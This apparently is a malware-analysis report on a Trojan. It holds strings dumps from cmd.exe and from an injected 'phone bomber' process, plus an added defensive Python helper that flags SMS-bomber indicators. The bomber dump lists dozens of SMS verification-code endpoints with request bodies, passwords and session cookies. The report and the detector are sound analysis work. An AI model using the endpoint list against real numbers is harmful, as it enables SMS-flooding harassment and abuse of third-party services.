x.E.A.. .@...W..e0M<@..4d..Rq0..oL........f.i...cO.\......cf.....,.....a.'.KqO..S...Q...N....^...s.B.......&.....0p...q........."5.HTTP/1.1 200 OK..Server: kws..Date: Thu, 22 May 2014 13:32:02 GMT..Content-Type: text/plain..Content-Length: 131..Last-Modified: Thu, 09 Jan 2014 09:33:51 GMT..Connection: keep-alive..Accept-Ranges: bytes..x.E.A.. .@...W..e0M<@..4d..Rq0..oL........f.i...cO.\......cf.....,.....a.'.KqO..S...Q...N....^...s.B.......&.....0p...q........."5...
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
cmd.exe_520:
.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
USER32.dll
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
SHELL32.dll
MPR.dll
RegEnumKeyW
RegDeleteKeyW
RegCloseKey
RegOpenKeyW
RegCreateKeyExW
RegOpenKeyExW
ShellExecuteExW
CmdBatNotification
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
_pipe
GetProcessWindowStation
cmd.pdb
CMD Internal Error %s
)(&&())))(&))
)&((&)&))&())
)&((&)&)&()))
)(&&()))&))))
CMD.EXE
()|&=,;"
COPYCMD
\XCOPY.EXE
CMDCMDLINE
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
0123456789
cmd.exe
DIRCMD
%d.%d.d
Ungetting: '%s'
DisableCMD
GeToken: (%x) '%s'
%s\Shell\Open\Command
%x %c
*** Unknown type: %x
Args: `%s'
Cmd: %s Type: %x
%s (%s) %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
.exe"
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
CMDEXTVERSION
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%s %s
(%s) %s
%s %s%s
&()[]{}^=;!%' ,`~
d%sd%s
-%sd%sd%sd
d%sd%sd
%s=%s
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
\CMD.EXE
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Windows
Operating System
5.1.2600.5512
Press any key to continue . . . %0
operable program or batch file.
The system cannot execute the specified program.
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
a pipe operation.
KEYS is on.
KEYS is off.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
$B | (pipe)
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
under Windows XP.
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
this version of the operating system.
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
* / %% - arithmetic operators
- - arithmetic operators
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
%%CD%% - expands to the current directory string.
%%DATE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
%%4 %%5 ...)
CMD /? for details.
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
command execution.
non-executable files may be invoked through their file association just
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
different parsing options. The keywords are:
be passed to the for body for each iteration.
be passed to the for body for each iteration.
where a back quoted string is executed as a
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
Missing operand.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
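Added triage example (not part of the Lavasoft report and not the sample's own code). The string dump that follows belongs to the process the Trojan injects into, PID 652, whose GBK filename is rendered ÊÖ»úºäÕ¨»ú.exe in the process list and decodes to 手机轰炸机.exe, literally "phone bomber". Its strings are dominated by dozens of third-party registration and SMS verification-code endpoints, a fixed user agent, form-urlencoded POST bodies, the raw device path \\.\PhysicalDrive0 and the SetWindowsHookExA/UnhookWindowsHookEx pair, which is why the behaviour reads as an SMS-bombing tool rather than a generic downloader. The Python helper below pulls exactly those indicators out of a one-string-per-line dump: it extracts URLs, keeps the ones whose path or query looks like an SMS code sender, counts distinct target hosts, and flags raw-device paths and hooking APIs. The sample input is a constructed excerpt of strings taken from this report; the SMS_HINTS list and the MIN_SMS_HOSTS threshold are my assumptions, not anything the report defines.

```python
"""Triage helper for a one-string-per-line process dump (added example)."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample: strings copied from the report's dump of the injected
# process, plus a few neutral ones, so the helper runs offline.
SAMPLE_STRINGS = [
    "user32.dll",
    "SetWindowsHookExA",
    "HttpSendRequestA",
    r"\\.\PhysicalDrive0",
    "http://www.shzly.in/plwlyz/",
    "http://passport.soufun.com/ajax/ajaxmobilecode_v3.aspx",
    "http://www.baixing.com/ajax/auth/sendCode/?mobile=",
    "http://chinatelecom.zc.qq.com/cgi-bin/send_sms",
    "http://i.360.cn/smsApi/sendsmscode?account=",
    "http://reg.email.163.com/mailregAll/sendvcode.do?",
    "http://www.iec.ch",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
    "4g.qD",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Assumed path/query fragments that recur in SMS verification-code endpoints.
SMS_HINTS = ("sms", "vcode", "sendcode", "mobilecode", "phonecode",
             "checkphone", "mobile=", "phone=")
# Raw disk access: \\.\PhysicalDriveN or \\.\ScsiN:
RAW_DEVICE_RE = re.compile(r"^\\\\\.\\(physicaldrive|scsi)", re.IGNORECASE)
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW",
             "WriteProcessMemory", "CreateRemoteThread"}
MIN_SMS_HOSTS = 3  # assumption: this many distinct targets is beyond any legitimate client


def extract_urls(strings):
    """Return every http(s) URL in the dump, in order, without duplicates."""
    seen, urls = set(), []
    for s in strings:
        for url in URL_RE.findall(s):
            if url not in seen:
                seen.add(url)
                urls.append(url)
    return urls


def sms_endpoints(urls):
    """Keep URLs whose path or query looks like an SMS code-sending endpoint."""
    out = []
    for url in urls:
        parts = urlsplit(url)
        target = (parts.path + "?" + parts.query).lower()
        if any(hint in target for hint in SMS_HINTS):
            out.append(url)
    return out


def triage(strings):
    """Summarise a dump into the indicators a responder acts on."""
    urls = extract_urls(strings)
    sms = sms_endpoints(urls)
    sms_hosts = Counter(urlsplit(u).hostname for u in sms)
    report = {
        "urls": urls,
        "sms_endpoints": sms,
        "sms_hosts": dict(sms_hosts),
        "raw_device": sorted(s for s in strings if RAW_DEVICE_RE.match(s)),
        "hook_apis": sorted(s for s in strings if s in HOOK_APIS),
    }
    # Many distinct hosts, all with code-sending endpoints, is the SMS-bomber signature.
    report["sms_bomber_like"] = len(sms_hosts) >= MIN_SMS_HOSTS
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_STRINGS)
    print("SMS-bomber-like:", r["sms_bomber_like"])
    for url in r["sms_endpoints"]:
        print("  sms endpoint:", url)
    print("raw device access:", r["raw_device"])
    print("hooking APIs:", r["hook_apis"])
```

On the full dump the host count runs far above the threshold; the same hint list also separates the bomber's endpoints from the ordinary update and telemetry hosts of the bundled tencentdl.exe and KNBCenter.exe processes further down, which carry none of them.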
手机轰炸机.exe_652:
.text
`.rdata
@.data
Hi.Chief;
Hi.ChiefuP
.rsrc
t$(SSh
~%UVW
t.It It
u$SShe
4g.qD
user32.dll
ntdll.dll
kernel32.dll
Setupapi.dll
gdiplus.dll
GdiPlus.dll
Kernel32.dll
wininet.dll
User32.dll
Ole32.dll
gdi32.dll
ole32.dll
msimg32.dll
Gdi32.dll
Gdiplus.dll
UxTheme.dll
CreateWindowStationA
CloseWindowStation
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
EnumWindows
GetKeyState
GdipSetStringFormatHotkeyPrefix
SetWindowsHookExA
UnhookWindowsHookEx
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
config.ini
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
30426153
piaofh.asp
plyzxl.asp
piaoyh.asp
http://www.shzly.in/plwlyz/
MSXML2.XMLHTTP
Microsoft.XMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP.6.0
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
application/x-www-form-urlencoded
\\.\PhysicalDrive0
10/05/12
\.YVV
Ï[H
L <
Ex_DirectUI_MsgBox
msg_wnd
http://www.shzly.in/
http://www.pubyun.com/accounts/signup_vcode/4449056/?mobile=
http://
https://
http=
HTTP/1.1
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
http://www.istudy.com.cn/incpage/ARandomCode.html
http://mp3.easou.com/dg.e?l=2ld.1&esid=xf5aHaRUMZo&wver=c
&song=花ç«-ä¸Â当&esid=xf5aHaRUMZo&id=1514183&submit=通过短信免费点播
http://wap.mail.163.com/reg.s?regtype=mobile
&password=19951221&password2=19951221&action=提交注册信息
http://i.house.sina.com.cn/index.php
&password=19951221&province=50&city=500100&auth_code=夫相&nickname=159xxxx0043&type=mobile&inviteid=&ctrl=register&act=create_mobile
loginname=
http://www.m3.cc/url.php?class=check
http://www.gogo.com/js/regAjax.ashx
http://passport.soufun.com/ajax/ajaxmobilecode_v3.aspx
http://www.chinaface.com/aj/user/mobileregister
http://reg.jiayuan.com/libs/xajax/reguser.server.php?processUserMobile
&xajaxr=1341738718781
xajax=processUserMobile&xajaxargs[]=<xjxquery><q>mobile=</q></xjxquery>
http://reg.jiayuan.com/libs/xajax/reguser.server.php?processSendOrUpdateMessage
&xajaxargs[]=mobile&xajaxr=1341738718874
xajax=processSendOrUpdateMessage&xajaxargs[]=<xjxquery><q>mobile=</q></xjxquery>
http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery17209392130269428131_1341739007515&mobile=
http://www.dianping.com/ajax/json/account/reg/mobile/send
http://reg.ztgame.com/registe/mobilePhoneRegister
http://user.qunar.com/ajax/validator.jsp
http://saa.auto.sohu.com/reg/mobileReg.at
&vuser.nickName=952898714&vuser.pwd=nizaina&repasswd=nizaina&vuser.rStatus=1&vuser.rBrandId=218&vuser.rModelId=1947&validate=bdxh
vuser.userMobile=
http://www.keepc.com/voip/registerForMobileForCode.act
http://www.skywldh.com/registerForMobileForCode.act
http://www.uwewe.com/get/SendMessage.aspx?phone=
http://www.139talk.com/user/regnum.html
&type=1&key=btdufou6jv7vc3ed5142m56hu6
http://newreg.eesina.net//servlet/ValidatePhone?time=
http://newreg.eesina.net//servlet/RandomServlet?time=
http://chinatelecom.zc.qq.com/cgi-bin/send_sms
http://login.m18.com/Service/ContactService.ashx?Method=RegisterByPhoneSendCheckCode&MobilePhone=
http://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx
http://passport.eastmoney.com/chkphone.aspx
http://service.che168.com/Ashx/CreateMobileCode.ashx
http://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=
http://reg.email.163.com/mailregAll/sendvcode.do?
&domain=163.com&mobile=
http://passport.wanmei.com/NoteAction.do?method=sendCode
http://www.aicall800.com/freecall.php
&password=19951221&seccode=wryk&PhoneNumber=
http://member1.taobao.com/member/new_set_cell_phone.do
paras=MTAyOTk5NjgwOQ==&css_style=&userNumId=1029996809&mobile_area=1&mobile=
http://www.baixing.com/ajax/auth/sendCode/?mobile=
http://passport.17u.cn/Member/RegisterHandler.ashx?action=phone&phone=
http://u.uzai.com/SendCheckCode
http://user.qunar.com/user/confirmContact.jsp?ret=/userinfo/index.jsp
http://www.dreams-travel.com/user/reg/reg_action.asp
&user_tel=&user_name=残破而&user_sfz=0&country=China中国&province=省(州)&city=北京&username=952898714@qq.com&user_password=19951221&user_password1=19951221&zcxy=1&dzzk=1&yzfs=tel&imageField.x=28&imageField.y=14
user_email=952898714@qq.com&zc_tel=
http://www.mangocity.com/mbrweb/registerAjax/randomNumber.action
http://yuyue.shdc.org.cn/User/ajaxSendConfirmCode.aspx
http://www.tianpin.com/user/send_telephone_code
http://yantubbs.com/register.php?nowtime=1352018399000&verify=f40830d2
http://passport.q.com.cn/register/index/sendphonecode/
&_=1352018752859
http://gwpassport.woniu.com/v2/sendsms?jsoncallback=jQuery17204481290172278189_1352018741044&mobile=
http://service.cq.10086.cn/app?service=ajaxDirect/1/newLogin.login/newLogin.login/javascript/&pagename=newLogin.login&eventname=sendSMSlogin&&SERIAL_NUMBER=
http://bbs.zhue.com.cn/ajax.php?infloat=register&handlekey=register&action=getverifycode1&mobile=
http://www.frisochina.com/ajax/GetPhoneCode.aspx?mobile=
http://mail.sina.com.cn/cgi-bin/phonecode.php
http://www.51taonan.com/?page=join&handler=ajax&action=send_reg_mobile_vcode&page_key=7ef0c64ccfeccd5cdda1306c3b769e1b&mobile_number=
http://reg.99114.com/Ajax/Secrity.ashx?action=passwordprotect&type=1&phone=
http://my.checkoo.com/register.jsp?flow=smscode&mobile=
http://as.baidu.com/a/msg?act=sendtomobile&f=home_2015_0&mobile=
http://passport.kongzhong.com/x/call/plaincall/regjs.reSendVcode.dwr
c0-param1=string:1a1780ed-691b-466e-965d-532ab3b506eac0-param2=boolean:falsec0-param3=boolean:falsebatchId=1
callCount=1page=/register/reg_succ_phone.jsphttpSessionId=B138818BA9DBAD8D7A3A6220B45068F5scriptSessionId=53F4C2FEA4D843099C12C210057FA3DC486c0-scriptName=regjsc0-methodName=reSendVcodec0-id=0c0-param0=string:
http://www.cqsq.com/register.php
http://i.360.cn/smsApi/sendsmscode?account=
http://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.9170439269767781&userid=
http://www.kunlun.com/index.php?act=ajax.checkUsername&user_name=
&smsvcode=输入手机获取的验证码&_=1352977641984
http://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery17204441263292015887_1352977631016&phone=
http://www.91wan.com/huodong/bind_phone/get_code.php
http://my.xoyo.com/register/NewIsExist/?uid=
http://user.51wan.com/reg_index_sendphone_0.html
http://www.tiboo.cn/register.php?nowtime=1352981025093
http://user.syyx.com/ajax/users/checkusername.aspx?u=
http://core.u7u7.com/Inf/Register.aspx?jsoncallback=jsonp1352981442421&username=
&_=1352982551343 HTTP/1.1Accept: */*Referer: http://register.sdo.com/gaea/phone_default.aspx?from=89&zone=home_embed&NotifyId=dnEnv1Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 734; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)Host: authleqr.sdo.comConnection: Keep-AliveCookie: sdo_beacon_id=113.205.173.252.1350557866205.7; SNDA_ADRefererSystem_UserTicket=a2b6c754-ff5b-4ac9-b226-9c47dceedf1e; SNDA_ADRefererSystem_ADID=; SNDA_ADRefererSystem_RefererUrl=http://register.sdo.com/gaea/phone_default.aspx?from=89&zone=home_embed&NotifyId=dnEnv1; SNDA_ADRefererSystem_RefererTime=2012-11-15 20:20:53; SNDA_ADRefererSystem_InSiteUrl=http://adrs.sdo.com/ADRefererSystem/prereg.html; SNDA_ADRefererSystem_ClientSign=BD69A9244616AAB258C27E9AF8C11B36; SNDA_ADRefererSystem_MachineTicket=a2b6c754-ff5b-4ac9-b226-9c47dceedf1e
GET /lars/check-account-types.jsonp?callback=jQuery16207765257628973603_1352982046643&userId=
http://www.haodou.com/user/register.php?do=checkphone&phone=
http://x5.51.com/register/index.php?a=send_sms&time=
&User_Password=19951221&User_RePassword=19951221&User_Sex=true&User_Age=5&User_Shen=28&User_Town=2&User_City=2
&_=1352983295921
http://gwpassport.woniu.com/v2/sendsms?jsoncallback=jQuery17205666854927724374_1352983199964&mobile=
&nickname=大厦大厦&password=1d88b2bc03e98603188da35275e88ac6&pd=30&om=0&verifycode=F6TDE&cache=1352983608812&regfrom=
http://login.i.xunlei.com/register?jsoncallback=jsonp1352983484410&m=new&mail=
http://passport.szgla.com/Validate/UserName?q=2204.1553552751447
http://www.1732.com/public/ajax.aspx?app=sendcode&bindaccount=
http://agent.eju.com/register/sendmobilereg
http://www.17lu.cn/register.php?nowtime=1352984434062&verify=edf8826b
http://www.55188.com/smssend_ajax.php?f=3
http://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery1720998364229230869_1352987358344&phone=
http://www.maiduo.com/handler/Register/Register.ashx?act=check&mobile=
http://www.sinosig.com/auth/regist_resetMsg.action
http://fmail.21cn.com/freeinterface/jsp/reg/getSmsVilCode.jsp
http://fmail.21cn.com/message/sendSMS
http://user.huitongke.com/member!getVerificationCode.action?mobile=
http://passport.cntv.cn/mobileRegister.do
&_=1353664161421
http://www.aapinche.cn/ajax/mobile_code.ashx?do=get&mobile=
http://m.jxedt.com/about/sendmsgtomobile.asp
type=wapurl&mobile=
&submit=确定
type=iphoneurl&mobile=
type=androidurl&mobile=
http://a3.act.jj.cn/www/get_sms_code.php?callback=jsonp1353664437829&_=1353664492296&mobile=
http://bbs.fobshanghai.com/ajax.php?inajax=1&action=checkmobile&mobile=
http://www.paixie.net/member/verify_phone_async.php?type=sendcode&phone=
HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 10:15:51 GMTServer: Apache CoyoteSet-Cookie: OZ_0Y_1701=1701&A_aHR0cDovL3d3dy5wYWl4aWUubmV0Lz9fc3ZfY29kZT00MDNfNDgwMDY4OF8xNzY2NDU0Mjc=&1353665665&-&1353665751&1&732033; path=/; domain=.oadz.comP3P: CP=NOI DSP LAW NID IVAa OUR STP UNICache-Control: no-cacheContent-Length: 43Keep-Alive: timeout=15, max=200Connection: Keep-AliveContent-Type: image/gifGIF89a
http://www.qgyyzs.net/business/checkregAjax.asp?menu=CheckRegSj&sj=
HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 10:38:57 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Length: 36Content-Type: text/html; Charset=gb2312Cache-control: private
http://auth.shequ.10086.cn/ajax/info.php?act=send_code
http://my.xizi.com/index.php?r=members/sendverify
http://www.taoxie.com/registerok.aspx?action=ajaxsendcode&mobile=
&verifyCode=&rand=56537441567125520&admin_uin=9176788&client_uin=&clientid=&visitor_comes=1&visitor_page=http://www.shgongshang.com/&visitor_last_page=&visitor_keyword=&visitor_entry=&cause=0
http://vip.tq.cn/vip/SendShortCall.do?uin=9186861&callPhone=
&verifyCode=&rand=52298377998835271&admin_uin=8429994&client_uin=&clientid=&visitor_comes=1&visitor_page=http://www.cppinfo.com/&visitor_last_page=&visitor_keyword=&visitor_entry=&cause=0
http://vip.tq.cn/vip/SendShortCall.do?uin=8429994&callPhone=
http://bbs.cnool.net/tools/getsms.aspx
09/27/12
Y]Key
http://sighttp.qq.com/msgrd?v=3&uin=885229130&site=qq&menu=yes
http://jifen.2345.com/wo/zhanghao.php
2OJ%U$
yo.zP&%
1.yZN
IEC http://www.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
urlTEXT
MsgeTEXT
Adobe Photoshop CS2 Windows
2008:06:29 22:36:52
G.wlUj^,
ÎbBP
63.cP
se%S<4
6.Wq\
=U%xJ
KF%s
1i.gN8
RU)%SV
J]=.eg
mSGF
Pv(.Vz
N.NEve
DUSv%UNV,
N).fv
6.SKn
-se.GTJ
3551177
www.52pojie.cn
HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 11:47:11 GMTServer: Apache CoyoteSet-Cookie: OZ_0Y_1701=1701&A_aHR0cDovL3d3dy5wYWl4aWUubmV0Lz9fc3ZfY29kZT00MDNfNDgwMDY4OF8xNzY2NDU0Mjc=&1353671204&-&1353671231&0&428186; path=/; domain=.oadz.comP3P: CP=NOI DSP LAW NID IVAa OUR STP UNICache-Control: no-cacheContent-Length: 43Keep-Alive: timeout=15, max=199Connection: Keep-AliveContent-Type: image/gifGIF89a
2@{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
yoSSSSh$J
www.shzly.in
885229130
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
SHLWAPI.dll
MPR.dll
VERSION.dll
p%U?c
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
x86 Family %s Model %s Stepping %s
X-X-X-X
X-X-X-X-X-X
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
2.Lsm
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
.?AVIUrlBuilderSource@@
.AnRH
.MCa:
T!n%d
1fÄ
$z%D?
\c%C|
À=p
%C$8O
tm.Uf
.iZPa
.sWu&6i*
4.LwE
e.KiV%
h7.Lc
^|#%C
%ChO4s1'TdR>
*Hc%Cl
Zx7EzR%X
w0e.edZZ
}f}U
6qp7%f
i].Kd
.IRp/-K
XcYfV%7x
À,c
%C$O`i
`.Lsx
]>.MN
cLj%C
~U`/]>.av
t/]vF}
3:4R%Sq
.Ca6&E(
n=.LgmR
Sq.Ge>N-(F
hcRT
A%CxS
.LwL.
cc.fW;
FÀ,g
T7%F->R
%FPn9
%C u^
4.LcY
.Pq{N
.Ca6&
%C$I-
